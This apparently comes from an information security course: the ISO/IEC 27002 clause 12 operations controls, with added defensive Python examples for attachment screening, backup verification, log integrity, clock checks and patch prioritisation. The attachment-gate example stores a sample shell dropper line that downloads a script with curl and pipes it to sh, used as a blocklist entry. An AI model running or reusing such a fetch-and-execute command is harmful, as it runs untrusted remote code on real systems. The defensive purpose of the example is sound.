Clauses 9, 10 and 11 of ISO/IEC 27002 which you feel are best suited to protecting the listed
information asset from unauthorized access. For each control selected, provide a justification for your
choice.
Asset                    Controls                    Justification
Payroll information
Website source code
Communication room
Technology staff
Laptops
12.1 Operational procedures and responsibilities
Objective: To ensure correct and secure operations of information processing facilities.
12.1.1 Documented operating procedures
Operating procedures should be documented and made available to all users who need them
There are a number of business processes that are key to information security and to running secure
operations. To ensure correct, repeatable and consistent operations, some of the activities within
these processes require formalization through documented operating procedures. Examples of typical
procedures that require documentation include backups, equipment maintenance, media handling,
visitor management, working in secure areas, installation and configuration of systems,
nonconformity or error handling, support and escalation, system restart and recovery procedures for
use in the event of system failure, event logging and monitoring.
12.1.2 Change management
Changes to the organization, business processes, information processing facilities and systems that
affect information security should be controlled.
Without effective change management, security vulnerabilities can be introduced leading to data
being compromised, often because security requirements have not been fully considered. Change
management (covering changes to the organization, business processes, information processing
facilities and systems that could affect information security) should be a business-centric process that
involves all appropriate stakeholders and ensures the maintenance and integrity of security controls.
Key activities within the change management process include:
• Identification and recording of significant changes
• Planning and testing of changes
• Impact assessment, including information security impacts of changes
• Formal approval procedure for proposed changes
• Verification that information security requirements have been met
• Communication of change details to all relevant persons
• Fall-back procedures, including procedures and responsibilities for aborting and recovering from
unsuccessful changes and unforeseen events
• Provision of an emergency change process to enable quick and controlled implementation of
changes needed to resolve an incident (see 16.1)
Formal management responsibilities and procedures should be in place to ensure satisfactory control
of all changes.
12.1.3 Capacity management
The use of resources should be monitored, tuned and projections made of future capacity
requirements to ensure the required system performance
Security and operational processes and systems depend on adequate resource availability to achieve
required performance levels. Resources to be considered include human resource capacity, premises,
processing resources, storage space, bandwidth, power supply etc.
Even where technology services are provided in the Cloud (offering scalability and elasticity) capacity
requirements for business critical resources should be identified and usage monitored.
Future capacity projections should be made as appropriate, to ensure resource requirements are
properly planned for and where necessary, used to improve the availability and efficiency of systems.
Particular attention should be paid to any critical resources with long procurement lead times, with
specialist requirements or with high costs.
Through analysis of capacity monitoring results and usage trends, managers should flag and avoid
potential bottlenecks and dependencies on key personnel that might present a threat to system
security or services, and plan appropriate action.
Providing sufficient capacity can be achieved by increasing capacity or by reducing demand.
Managing capacity demand may be achieved in a number of ways including the deletion of obsolete
data (disk space), decommissioning or reusing redundant resources, optimizing processes and
application logic, denying or restricting bandwidth for any resource-hungry services which are not
business critical (e.g. video streaming).
A documented capacity management plan should be considered for business critical resources.
12.1.4 Separation of development, testing and operational environments
Development, testing, and operational environments should be separated to reduce the risks of
unauthorized access or changes to the operational environment.
Development and testing activities can cause significant problems in the operational environment e.g.
unwanted modification of files or system environment or system failure.
There is a need to maintain a known and stable environment in which to perform meaningful testing
and to prevent inappropriate developer access to the operational environment.
Requirements for the appropriate separation of development, testing, and operational environments
should be identified and implemented to reduce the risks of unauthorized access or changes to the
operational environment. Policy provisions for the management of environments and the transfer of
data between them should be established.
The following items should be considered in relation to the separation of environments:
• Development and operational software should run on different systems or computer processors
and in different domains or directories
• Wherever possible, changes to operational systems and applications should be tested in a testing
or staging environment prior to being promoted to live operational systems
• Development tools and systems utilities should not be accessible from operational systems when
not required
• Users of development, test and operational environments should use different user profiles when
working in different environments and menus should display appropriate identification messages to
reduce the risk of error and in some systems reduce the risk of fraud
• Sensitive data should not be copied into the testing system environment unless equivalent controls
are provided for the testing system (see 14.3)
12.2 Protection from malware
Objective: To ensure that information and information processing facilities are protected against
malware.
12.2.1 Controls against malware
Detection, prevention and recovery controls to protect against malware should be implemented,
combined with appropriate user awareness.
Malware and cyber crime are becoming ever more prevalent with ever changing attack vectors
emerging. Protecting against malware needs to include a combination of detection, prevention and
recovery controls in addition to appropriate user awareness.
Malware prevention, detection and repair software should be used and updated, alongside a
programme capable of being both proactive and reactive to promote user security awareness.
Malware detection and repair software should scan computers and media, including: any files received
over networks or via any form of storage medium, before use; electronic mail attachments and
downloads, before use (this scan may be carried out at different places, e.g. at electronic mail
servers, on desktop computers and at the point of entry to the organization's network); and web
pages.
Vulnerability management is another vital component to reduce vulnerabilities that could be exploited
by malware (see 12.6).
Other key supporting controls include appropriate system access and change management controls.
Organizations should make anti-malware policy provisions that may include:
• Prohibiting the use of unauthorized software (see 12.6.2 and 14.2)
• Prohibiting interference with security controls and settings
• Requirements for conducting regular reviews of the software and data content of systems
supporting critical business processes
• Investigating the presence of any unapproved files or unauthorized amendments
• Defining and maintaining procedures and responsibilities to deal with malware protection on
systems, training in their use, reporting and recovering from malware attacks
• Preparing appropriate business continuity plans for recovering from malware attacks, including all
necessary data and software backup and recovery arrangements (see 12.3)
• Obtaining appropriate malware threat intelligence and malware verification from qualified sources
(such as subscribing to vendor mailing lists, special interest groups or verifying websites giving
information about new malware)
• Isolating environments where catastrophic impacts may result
• Taking precautions to protect against the introduction of malware during maintenance and
emergency procedures, which may bypass normal malware protection controls
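As an added example of the "scan before use" control for e-mail attachments described above (it is not part of ISO/IEC 27002 or the BSI course material), the Python gate below applies three checks that sit in front of, not instead of, a signature-based scanner: the content's leading bytes must agree with the claimed file type, executables are rejected whatever they are named (including inside ZIP containers), and the SHA-256 is compared against a blocklist. The allow-list, the blocklist entry, the dropper sample and every attachment in SAMPLES are constructed for the example; in practice the blocklist would be fed from the threat-intelligence sources the policy bullets mention.

```python
"""Mail-gateway attachment gate: quarantine files whose content contradicts their
claimed type, that carry executables, or whose hash is on a blocklist.

Added example; not from ISO/IEC 27002 or the BSI course. The allow-list, the
blocklist and all sample attachments are constructed for the demo.
"""
import hashlib
import io
import zipfile
from typing import Optional

# Leading-byte signatures used to sniff the real content type.
MAGIC = {
    b"%PDF-": "pdf",
    b"MZ": "exe",                         # PE executable, DLL, screensaver
    b"PK\x03\x04": "zip",                 # also docx, xlsx, jar, apk
    b"\x89PNG\r\n\x1a\n": "png",
}
ALLOWED_EXT = {"pdf", "png", "zip", "docx", "xlsx", "txt"}
CONTAINER_EXT = {"docx": "zip", "xlsx": "zip"}   # Office Open XML files are ZIP containers
DANGEROUS_MEMBER_EXT = {"exe", "dll", "scr", "js", "jse", "vbs", "hta", "bat", "cmd", "ps1", "lnk"}

# Constructed stand-in for a threat-intelligence feed entry (a shell dropper).
DROPPER = b"#!/bin/sh\ncurl -s http://198.51.100.9/p | sh\n"
BLOCKED_SHA256 = {hashlib.sha256(DROPPER).hexdigest()}


def sniff(data: bytes) -> Optional[str]:
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def inspect_attachment(name: str, data: bytes) -> list[str]:
    """Return the reasons to quarantine; an empty list means the file passed the gate."""
    reasons = []
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED_EXT:
        reasons.append(f"extension '{ext or '(none)'}' not on allow-list")

    digest = hashlib.sha256(data).hexdigest()
    if digest in BLOCKED_SHA256:
        reasons.append(f"sha256 {digest[:16]}... on blocklist")

    kind = sniff(data)
    expected = CONTAINER_EXT.get(ext, ext)
    if kind == "exe":
        reasons.append("executable content regardless of name")
    elif kind and expected in MAGIC.values() and kind != expected:
        reasons.append(f"content is {kind} but name claims {ext}")

    if kind == "zip":                     # look inside containers for executables
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.namelist():
                    mext = member.rsplit(".", 1)[-1].lower() if "." in member else ""
                    if mext in DANGEROUS_MEMBER_EXT:
                        reasons.append(f"archive member '{member}' is executable")
        except zipfile.BadZipFile:
            reasons.append("ZIP signature but container is unreadable")
    return reasons


def build_sample_zip() -> bytes:
    """Constructed archive: a harmless text file plus a renamed PE stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "Quarterly figures attached.")
        zf.writestr("figures/update.exe", b"MZ\x90\x00" + bytes(60))
    return buf.getvalue()


SAMPLES = {
    "report.pdf": b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n",
    "invoice.pdf": b"MZ\x90\x00\x03\x00\x00\x00" + bytes(56),   # PE renamed to .pdf
    "scan.jpg.exe": b"MZ\x90\x00" + bytes(60),                  # double extension
    "notes.txt": DROPPER,                                       # matches the blocklist
    "figures.zip": build_sample_zip(),
}


def run_gate() -> dict[str, list[str]]:
    return {name: inspect_attachment(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, reasons in run_gate().items():
        print(name, "->", "delivered" if not reasons else "quarantined: " + "; ".join(reasons))
```

The gate deliberately quarantines on the first disagreement between name and content rather than trusting either; an attacker controls both the file name and the leading bytes, so the magic table must be treated as a screening aid and the quarantine still fed to a proper scanner and, where the policy requires it, a human reviewer.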
12.3 Backup
Objective: To protect against loss of data.
12.3.1 Information backup
Backup copies of information, software and system images should be taken and tested regularly in
accordance with an agreed backup policy.
Information classification (including availability requirements) should be taken into account when
establishing an organization’s backup policy, retention and protection requirements. Backup copies of
information, software and system images should be taken and tested regularly in accordance with an
agreed backup policy, including the requirement to monitor the execution of backups and address
failures of scheduled backups to ensure their completeness.
Adequate backup facilities should be provided to ensure that all essential information and software
can be recovered following a disaster or media failure. The extent (e.g. full or differential backup)
and frequency of backups should reflect business and security requirements of the information
involved and the criticality of the information to the continuity of the organization.
Backup requirements should be documented and planned including appropriate arrangements for:
• Maintaining accurate and complete records of backup copies
• Restoring backups and performing regular restore testing on dedicated test media
• Securely storing backups (either virtual or with adequate physical geographic separation from the
original data source)
• Applying appropriate environmental protection for the storage of backups
• Encrypting sensitive backup data
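The following is an added example and is not part of ISO/IEC 27002 or the BSI course material. It shows, in Python, two of the arrangements listed above that are easy to state and easy to get wrong in practice: keeping an accurate record of what a backup contained (a manifest of sizes and SHA-256 digests), verifying a restore against that record, and monitoring the schedule so a silently failed backup is noticed. File sets are held in memory as {path: bytes} maps so the example runs offline; the file names, contents and timestamps are constructed. Encryption of the backup data itself is left out here because it needs a cryptography library; see Clause 10.

```python
"""Backup manifest, restore verification and schedule monitoring.

Added example; not from ISO/IEC 27002 or the BSI course. File sets are
in-memory {path: bytes} maps so it runs offline; the same functions apply
to files read from disk or from a backup archive.
"""
import hashlib
from datetime import datetime, timedelta, timezone
from typing import Optional


def make_manifest(files: dict[str, bytes]) -> dict[str, dict]:
    """Record size and SHA-256 of every file at backup time.
    The manifest must be stored separately from the backup set (and ideally signed),
    otherwise an attacker who alters the backup can alter the record too."""
    return {
        path: {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()}
        for path, data in files.items()
    }


def verify_restore(manifest: dict[str, dict], restored: dict[str, bytes]) -> list[str]:
    """Compare a restore against the manifest: missing, altered and unexpected files."""
    problems = []
    for path, entry in manifest.items():
        data = restored.get(path)
        if data is None:
            problems.append(f"missing: {path}")
        elif len(data) != entry["size"] or hashlib.sha256(data).hexdigest() != entry["sha256"]:
            problems.append(f"altered: {path}")
    for path in sorted(restored.keys() - manifest.keys()):
        problems.append(f"unexpected: {path}")
    return problems


def check_schedule(last_success: datetime, interval: timedelta, now: datetime,
                   grace: timedelta = timedelta(hours=2)) -> Optional[str]:
    """Flag a scheduled backup whose last successful run is older than the schedule allows."""
    age = now - last_success
    if age > interval + grace:
        return f"last successful backup {age} ago exceeds schedule {interval} plus {grace} grace"
    return None


# Constructed source data for the demo.
SOURCE = {
    "payroll/2017-11.csv": b"id,name,band\n1042,A. Example,C\n",
    "www/index.html": b"<html><body>Example</body></html>\n",
    "etc/app.conf": b"listen=127.0.0.1:8080\n",
}


def demo() -> tuple[list[str], Optional[str]]:
    manifest = make_manifest(SOURCE)
    restored = dict(SOURCE)
    restored["etc/app.conf"] = b"listen=0.0.0.0:8080\n"   # altered on the restored copy
    del restored["www/index.html"]                        # not restored at all
    restored["tmp/scratch.log"] = b"debug output\n"       # present but never backed up
    problems = verify_restore(manifest, restored)

    now = datetime(2017, 11, 22, 9, 0, tzinfo=timezone.utc)
    last_ok = datetime(2017, 11, 20, 2, 0, tzinfo=timezone.utc)  # nightly job missed a run
    return problems, check_schedule(last_ok, timedelta(days=1), now)


if __name__ == "__main__":
    problems, schedule_alert = demo()
    for p in problems:
        print("restore check:", p)
    print("schedule:", schedule_alert or "on schedule")
```

A restore test that only checks the job exit code proves nothing about the data; comparing the restored files against the manifest taken at backup time is what demonstrates that the backup is complete and unaltered, and the schedule check turns "the backup did not run" from something discovered during an incident into an alert raised the next morning.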
12.4 Logging and monitoring
Objective: To record events and generate evidence.
12.4.1 Event logging
Event logs recording user activities, exceptions, faults and information security events should be
produced, kept and regularly reviewed.
Event logging is critical in the detection of security incidents and events and in the generation of
evidence, and it sets the foundation for automated monitoring systems that are capable of generating
consolidated reports and alerts on system security.
Requirements for capturing system metadata within event logs should be specified for each system,
type or group of systems. Organizations reviewing their event logging capabilities as a precursor to
developing security incident and event monitoring should review what event logging data is currently
being captured versus what data is required and develop plans to address the gaps.
Examples of data collected within event logs include:
• User and device identity
• System activities
• Dates, times and details of key events (e.g. log-on and log-off)
• Records of successful and rejected system access attempts
• Records of successful and rejected data and other resource access attempts
• Changes to system configuration
• Use of privileges
• Use of system utilities and applications
• Network addresses and protocols
• Alarms raised by the access control system
• Activation and de-activation of protection systems, such as anti-virus systems and intrusion
detection systems
• Records of transactions executed by users in applications
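The "captured versus required" review described above can be automated against the log feed itself. The following is an added example (not part of the BSI course text) that maps the data items listed here onto an assumed JSON event schema and reports, per log source, which items are never or only sometimes present; the field names and the sample log lines are constructed for the example.

```python
"""Event-log coverage check: an added example, not part of the BSI course
text. It compares the data items 12.4.1 lists with what each log source is
actually capturing, which is the "captured versus required" review the text
describes. The JSON field names and the sample log lines are constructed
assumptions of this example."""
import json

# Data items from 12.4.1, mapped to the field name the (assumed) event schema uses.
REQUIRED_FIELDS = {
    "user identity": "user",
    "device identity": "host",
    "date and time of event": "ts",
    "event type": "event",
    "outcome (success/rejected)": "outcome",
    "network address": "src_ip",
    "use of privileges": "privileged",
}

# Constructed sample: a VPN gateway that logs everything, an HR application that
# does not, and one unparsable line of the kind a real collector will meet.
SAMPLE_LOG = """\
{"source":"vpn-gw","ts":"2017-11-02T08:15:02Z","host":"vpn1","user":"alice","event":"logon","outcome":"success","src_ip":"203.0.113.10","privileged":false}
{"source":"vpn-gw","ts":"2017-11-02T08:16:40Z","host":"vpn1","user":"bob","event":"logon","outcome":"rejected","src_ip":"203.0.113.22","privileged":false}
{"source":"hr-app","ts":"2017-11-02T09:01:11Z","user":"carol","event":"record_view","outcome":"success"}
{"source":"hr-app","ts":"2017-11-02T09:02:30Z","user":"carol","event":"config_change"}
garbage line that is not JSON
"""


def parse_events(text: str):
    """Return (events, bad_line_numbers). Unparsable lines are reported rather
    than dropped silently, since a collector that loses lines is itself a gap."""
    events, bad = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            bad.append(lineno)
            continue
        if isinstance(ev, dict) and "source" in ev:
            events.append(ev)
        else:
            bad.append(lineno)
    return events, bad


def logging_gaps(events):
    """Per log source: required items never present (always_missing) and items
    present in some events but not others (sometimes_missing)."""
    by_source = {}
    for ev in events:
        by_source.setdefault(ev["source"], []).append(ev)
    report = {}
    for source, evs in by_source.items():
        always, sometimes = [], []
        for item, field in REQUIRED_FIELDS.items():
            present = sum(1 for ev in evs if field in ev)
            if present == 0:
                always.append(item)
            elif present < len(evs):
                sometimes.append(item)
        report[source] = {"events": len(evs), "always_missing": always,
                          "sometimes_missing": sometimes}
    return report


if __name__ == "__main__":
    evs, bad = parse_events(SAMPLE_LOG)
    print("unparsable lines:", bad)
    for src, gap in logging_gaps(evs).items():
        print(src, gap)
```

Items in always_missing need a configuration or development change at the source; items in sometimes_missing usually mean one event type is logged with less detail than another, which is worth knowing before an incident rather than during one.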
12.4.2 Protection of log information
Logging facilities and log information should be protected against tampering and unauthorized
access.
Logging facilities and log information should be protected against tampering, unauthorized access
and changes including alterations to the message types that are recorded and log files being edited
or deleted. System logs need to be protected, because if the data can be modified or data in them
deleted, their existence may create a false sense of security. Real-time copying of logs to a system
outside the control of a system administrator or operator or storage separation can be used to
safeguard logs.
It is important to manage and monitor the storage capacity of the log file media to ensure capacity is
not exceeded, resulting in either the failure to record events or over-writing of past recorded events.
Some audit logs may be required to be archived as part of the record retention policy or because of
requirements to collect and retain evidence (see 16.1.7).
System logs often contain a large volume of information, much of which is extraneous to information
security monitoring. To help identify significant events for information security monitoring purposes,
the copying of appropriate message types automatically to a second log, or the use of suitable
system utilities or audit tools to perform file interrogation and rationalization, should be considered.
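Real-time copying of logs to a system outside the administrator's control is the standard's answer to tampering; a hash chain makes the local copy tamper-evident as well and shows why the off-host copy is still needed. The following is an added example (not part of the BSI course text) of an append-only log whose records are chained by SHA-256; the record layout and the sample administrator activity are constructed for the example.

```python
"""Tamper-evident log store: an added example, not part of the BSI course
text. Each record is chained to the previous one by a SHA-256 hash, and the
latest hash is what would be copied in real time to a system outside the
administrator's control (12.4.2). Verification then detects edited records,
deleted records and, given that off-host copy, a truncated tail. The record
format is an assumption of this example."""
import copy
import hashlib
import json
from typing import Optional

GENESIS = "0" * 64   # prev-hash value for the first record


def _digest(seq: int, prev: str, record: dict) -> str:
    payload = json.dumps({"seq": seq, "prev": prev, "record": record},
                         sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(payload.encode()).hexdigest()


def append(chain: list, record: dict) -> str:
    """Append a record and return its hash. Ship that hash off-host at once:
    it is the anchor that later proves the local chain was not cut short."""
    seq = len(chain)
    prev = chain[-1]["hash"] if chain else GENESIS
    entry = {"seq": seq, "prev": prev, "record": record,
             "hash": _digest(seq, prev, record)}
    chain.append(entry)
    return entry["hash"]


def verify(chain: list, anchor: Optional[str] = None):
    """Return (ok, reason). `anchor` is the most recent hash held off-host;
    without it, removal of the newest records cannot be noticed."""
    prev = GENESIS
    for i, e in enumerate(chain):
        if e["seq"] != i or e["prev"] != prev:
            return False, f"chain broken at position {i}"
        if _digest(e["seq"], e["prev"], e["record"]) != e["hash"]:
            return False, f"entry {i} altered"
        prev = e["hash"]
    if anchor is not None and prev != anchor:
        return False, "local chain does not end at the off-host anchor"
    return True, "ok"


def run_demo() -> dict:
    """Constructed administrator activity (12.4.3) and four tampering scenarios."""
    chain = []
    records = [
        {"ts": "2017-11-02T10:00:00Z", "user": "root", "event": "sudo", "cmd": "useradd tmpsvc"},
        {"ts": "2017-11-02T10:00:20Z", "user": "root", "event": "sudo", "cmd": "passwd tmpsvc"},
        {"ts": "2017-11-02T10:01:05Z", "user": "root", "event": "sudo", "cmd": "userdel tmpsvc"},
    ]
    anchor = None
    for r in records:
        anchor = append(chain, r)          # anchor == hash of the last record

    edited = copy.deepcopy(chain)
    edited[1]["record"]["cmd"] = "ls"      # privileged user rewrites history
    deleted = copy.deepcopy(chain)
    del deleted[1]                         # a record vanishes from the middle
    truncated = copy.deepcopy(chain)[:-1]  # the newest record is removed

    return {
        "intact": verify(chain, anchor),
        "edited": verify(edited, anchor),
        "deleted": verify(deleted, anchor),
        "truncated_no_anchor": verify(truncated),
        "truncated_with_anchor": verify(truncated, anchor),
    }


if __name__ == "__main__":
    for name, (ok, reason) in run_demo().items():
        print(f"{name:22s} {'OK ' if ok else 'BAD'} {reason}")
```

The truncated case is the instructive one: a chain that is simply cut short still verifies, so the hash of the newest record has to live somewhere the local administrator cannot reach, which is the storage separation the text calls for.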
12.4.3 Administrator and operator logs
System administrator and system operator activities should be logged and the logs protected and
regularly reviewed.
Accounting for the actions performed by system administrators (privileged users) and by users is
important when investigating security breaches. Privileged user account holders may be able to
manipulate the logs on information processing facilities under their direct control; it is therefore
necessary to protect and review the logs to maintain accountability for privileged users.
An intrusion detection system (IDS) managed outside of the control of system and network
administrators can be used to monitor system and network administration activities for compliance.
12.4.4 Clock synchronization
The clocks of all relevant information processing systems within an organization or security domain
should be synchronized to a single reference time source.
Another important component in ensuring the accuracy of audit logs and the collection of evidence in
the event of a security breach, legal or disciplinary case is the synchronization of time references. All
requirements (internal or external) for time representation, synchronization and accuracy should be
documented. Such requirements can be legal, regulatory, contractual requirements, standards
compliance or requirements for internal monitoring.
The clocks of all relevant information processing systems within an organization or security domain
should be synchronized to a defined single standard reference time source. The organization’s
approach to obtaining a reference time from external source(s) and how to synchronise internal
clocks reliably should be documented and implemented, such as using the network time protocol
(NTP).
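Whether the documented accuracy requirement is actually met is something NTP lets you measure from a single exchange. The following is an added example (not part of the BSI course text) that applies the NTP offset and delay formulas (RFC 5905) to the four timestamps of a client/server exchange and flags hosts outside tolerance; the sample exchanges and the 0.5 s tolerance are constructed assumptions.

```python
"""Clock-offset check against a reference time source: an added example, not
part of the BSI course text. It applies the NTP (RFC 5905) offset and delay
formulas to the four timestamps of a client/server exchange and reports which
hosts exceed the organization's documented accuracy requirement. The sample
exchanges and the 0.5 s tolerance are constructed assumptions."""

# Constructed samples: (t1 client send, t2 server receive, t3 server send,
# t4 client receive), all in seconds. "db2"'s clock is about two seconds
# behind the reference; "ids1" is about 0.1 s ahead of it.
SAMPLES = {
    "web1": (100.000, 100.020, 100.021, 100.040),
    "db2":  (100.000, 102.010, 102.011, 100.022),
    "ids1": (100.000,  99.905,  99.906, 100.012),
}
MAX_OFFSET_S = 0.5   # assumed documented accuracy requirement


def ntp_offset_delay(t1, t2, t3, t4):
    """Offset of the reference clock relative to the local clock (positive
    means the local clock is behind) and the round-trip delay, as NTP computes them."""
    offset = ((t2 - t1) + (t3 - t4)) / 2
    delay = (t4 - t1) - (t3 - t2)
    return offset, delay


def check_clocks(samples, max_offset_s=MAX_OFFSET_S):
    """Per host: measured offset/delay and whether it meets the requirement."""
    report = {}
    for host, (t1, t2, t3, t4) in samples.items():
        offset, delay = ntp_offset_delay(t1, t2, t3, t4)
        report[host] = {"offset_s": offset, "delay_s": delay,
                        "in_tolerance": abs(offset) <= max_offset_s}
    return report


def to_reference_time(local_ts, offset):
    """Map a timestamp from a drifted host's log onto reference time, so events
    from different systems can be ordered correctly during an investigation."""
    return local_ts + offset


if __name__ == "__main__":
    for host, r in check_clocks(SAMPLES).items():
        flag = "ok" if r["in_tolerance"] else "OUT OF TOLERANCE"
        print(f"{host}: offset {r['offset_s']:+.4f}s delay {r['delay_s']:.4f}s {flag}")
```

A host outside tolerance is both a configuration finding (fix its synchronization) and an evidence-handling note: until it is fixed, its log timestamps must be corrected by the measured offset before they are correlated with other systems' logs.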
12.5 Control of operational software
Objective: To ensure the integrity of operational systems.
12.5.1 Installation of software on operational systems
Procedures should be implemented to control the installation of software on operational systems.
Uncontrolled installation of software on computing devices can lead to the introduction or exploitation
of known vulnerabilities and then to information leakage, data corruption, loss of availability through
ransomware attacks or other information security incidents, or to the violation of intellectual property
rights. Procedures for software installation are therefore needed to protect the integrity of
operational systems.
Vendor supplied software used in operational systems should be maintained at a level supported by
the supplier. Over time, software vendors cease to support older versions of software and
organizations should assess the risks of relying on unsupported software.
Decisions to upgrade to a new release should take into account the business requirements for the
change and the security of the release, e.g. the introduction of new information security functionality
or the number and severity of information security problems affecting this version. Software patches
should be applied when they can help to remove or reduce information security weaknesses (see
12.6).
Physical or logical access should only be given to suppliers for support purposes when necessary and
with management approval. The supplier’s activities should be monitored (see 15.2.1).
Computer software may rely on externally supplied software and modules, which should be
monitored and controlled to avoid unauthorized changes, which could introduce security weaknesses.
The following considerations should be taken to control changes of software on operational systems:
• Restricting the updating of the operational software, applications and program libraries to only be
performed by trained administrators upon appropriate management authorization (see 9.4.5)
• Holding only approved executable code and not development code or compilers within operational
systems
• Establishing requirements for extensive and successful testing prior to installation, including
usability, security, effects on other systems and user friendliness. Tests should be carried out on
separate systems (see 12.1.4) and all corresponding program source libraries must be updated
• Establishing a configuration control system to keep control of all implemented software as well as
system documentation
• Ensuring a rollback strategy is in place before changes are implemented
• Maintaining an audit log of all updates to operational program libraries
• Retaining previous versions of application software as a contingency measure
• Establishing archive and retention requirements for old versions of software, together with all
required information and parameters, procedures, configuration details and supporting software
for as long as the data is retained in archive
12.6 Technical vulnerability management
12.6.1 Management of technical vulnerabilities
Information about technical vulnerabilities of information systems being used should be obtained in a
timely fashion, the organization’s exposure to such vulnerabilities evaluated and appropriate measures
taken to address the associated risk.
Technical vulnerability management is an essential control in the prevention of exploitation of technical
vulnerabilities, increasingly used by cyber criminals to deliver ransomware and other malware payloads.
Vendors are often under significant pressure to release patches as soon as possible. A consequence of
rushing the release of patches is that patches can sometimes have negative side effects, increasing the
need for patches to be tested. If adequate testing of the patches is not possible, e.g. because of costs
or lack of resources, a delay in patching can be considered in order to assess the associated risks,
based on the experience reported by other users. The use of ISO/IEC 27031[14] can be beneficial. The
application of security patches should, however, always be treated as a high priority.
Information on the technical vulnerabilities of information systems being used should be obtained in a
timely fashion, the organization’s exposure to such vulnerabilities evaluated and appropriate measures
taken to address the associated risk. Appropriate and timely action should be taken in response to the
identification of potential technical vulnerabilities.
Technical vulnerability management can be viewed as a sub-function of change management and, as
such, can take advantage of the change management processes and procedures (see 12.1.2 and
14.2.2).
A current and complete inventory of assets (see Clause 8) is a prerequisite for effective technical
vulnerability management. Specific information needed to support technical vulnerability management
includes the software vendor, version numbers, current state of deployment (e.g. what software is
installed on what systems) and the person(s) within the organization responsible for the software.
In order to establish an effective management process for technical vulnerabilities, organizations should
consider:
• Defining and establishing the roles and responsibilities associated with technical vulnerability
management, including vulnerability monitoring, vulnerability risk assessment, patching, asset tracking
and any coordination responsibilities required
• Establishing and updating information resources for software and other technology that will be used to
identify relevant technical vulnerabilities and to maintain awareness about them (these should be based
on the asset inventory list, see 8.1.1)
• Defining a timeline to react to notifications of potentially relevant technical vulnerabilities
• Identifying the associated risks and the actions to be taken once a potential vulnerability has been
identified; such action could involve patching of vulnerable systems or applying other controls
• Implementing either change management or information security incident response procedures to
manage actions to address identified vulnerabilities, depending on how urgently a technical vulnerability
needs to be addressed
• Assessing risks associated with installing the patch (the risks posed by the vulnerability should be
compared with the risk of installing the patch)
• Testing and evaluating patches, where possible, to ensure they are effective and do not result in side
effects that cannot be tolerated; if no patch is available, other controls should be considered, such as:
• Turning off services or capabilities related to the vulnerability
• Adapting or adding access controls, e.g. firewalls, at network borders (see 13.1)
• Increased monitoring to detect actual attacks
• Raising awareness of the vulnerability
• Maintaining an audit log for all procedures undertaken
• Regularly monitoring and evaluating the effectiveness and efficiency of the technical vulnerability
management process
• Prioritizing vulnerability management actions, i.e. systems at high risk should be addressed first
• Aligning the technical vulnerability management process with incident management activities, to
communicate data on vulnerabilities to the incident response function and to provide technical
procedures should an incident occur
• Defining a procedure to address the situation where a vulnerability has been identified but there is no
suitable countermeasure. In this situation, the organization should evaluate risks relating to the known
vulnerability and define appropriate detective and corrective actions
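The inventory fields named above (vendor, product, version, deployment, responsible person) are what make an advisory actionable. The following is an added example (not part of the BSI course text) that matches constructed advisories against a constructed inventory, assigns each affected system a reaction deadline and orders the work list highest risk first. The advisory identifiers and products are placeholders, not real advisories, and the reaction-time policy is an assumption that reuses the 7/14/30-day priority levels from this course's change request key.

```python
"""Matching advisories against the asset inventory and setting reaction
deadlines: an added example, not part of the BSI course text. It uses the
inventory data 12.6.1 calls for (vendor, product, version, responsible person,
deployment) and an assumed reaction-time policy that reuses the 7/14/30-day
priority levels from this course's change request key. Advisory identifiers,
products and the scoring are constructed assumptions, not real advisories."""
from datetime import date, timedelta

TODAY = date(2017, 11, 2)   # assumed date of the review

INVENTORY = [   # constructed asset inventory (Clause 8)
    {"host": "web1", "vendor": "ExampleVendor", "product": "webserver", "version": "2.4.1",
     "owner": "ops-team", "internet_facing": True},
    {"host": "app3", "vendor": "ExampleVendor", "product": "webserver", "version": "2.4.9",
     "owner": "ops-team", "internet_facing": False},
    {"host": "db2", "vendor": "ExampleVendor", "product": "dbms", "version": "10.2.0",
     "owner": "dba-team", "internet_facing": False},
]

ADVISORIES = [   # constructed advisories; ids are placeholders, not real CVEs
    {"id": "ADV-EXAMPLE-1", "vendor": "ExampleVendor", "product": "webserver",
     "fixed_in": "2.4.5", "severity": "high"},
    {"id": "ADV-EXAMPLE-2", "vendor": "ExampleVendor", "product": "dbms",
     "fixed_in": "10.3.0", "severity": "medium"},
]

SEVERITY_WEIGHT = {"high": 3, "medium": 2, "low": 1}
REACTION_DAYS = {1: 7, 2: 14, 3: 30}   # priority level -> days, as in the change request key


def version_tuple(v):
    """Numeric comparison, so that 2.4.9 < 2.4.10 (string comparison gets this wrong)."""
    return tuple(int(x) for x in v.split("."))


def is_affected(asset, adv):
    return (asset["vendor"] == adv["vendor"] and asset["product"] == adv["product"]
            and version_tuple(asset["version"]) < version_tuple(adv["fixed_in"]))


def priority_level(severity, internet_facing):
    """Assumed policy: high=1, medium=2, low=3; internet exposure raises it one level."""
    level = {"high": 1, "medium": 2, "low": 3}[severity]
    if internet_facing and level > 1:
        level -= 1
    return level


def prioritize(inventory, advisories, today):
    """Return the work list, highest risk first, each item with its owner and deadline."""
    items = []
    for adv in advisories:
        for asset in inventory:
            if not is_affected(asset, adv):
                continue
            level = priority_level(adv["severity"], asset["internet_facing"])
            score = SEVERITY_WEIGHT[adv["severity"]] * (2 if asset["internet_facing"] else 1)
            items.append({"host": asset["host"], "owner": asset["owner"], "advisory": adv["id"],
                          "installed": asset["version"], "fixed_in": adv["fixed_in"],
                          "priority": level, "risk_score": score,
                          "deadline": today + timedelta(days=REACTION_DAYS[level])})
    return sorted(items, key=lambda i: (i["priority"], -i["risk_score"], i["host"]))


if __name__ == "__main__":
    for item in prioritize(INVENTORY, ADVISORIES, TODAY):
        print(f"P{item['priority']} {item['host']:5s} {item['advisory']:14s} "
              f"{item['installed']} -> {item['fixed_in']}  owner {item['owner']}  due {item['deadline']}")
```

Each work item carries the owner from the inventory and a due date derived from the defined timeline, which gives the audit log entry the text asks for and makes "systems at high risk first" a sort order rather than a judgement call.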
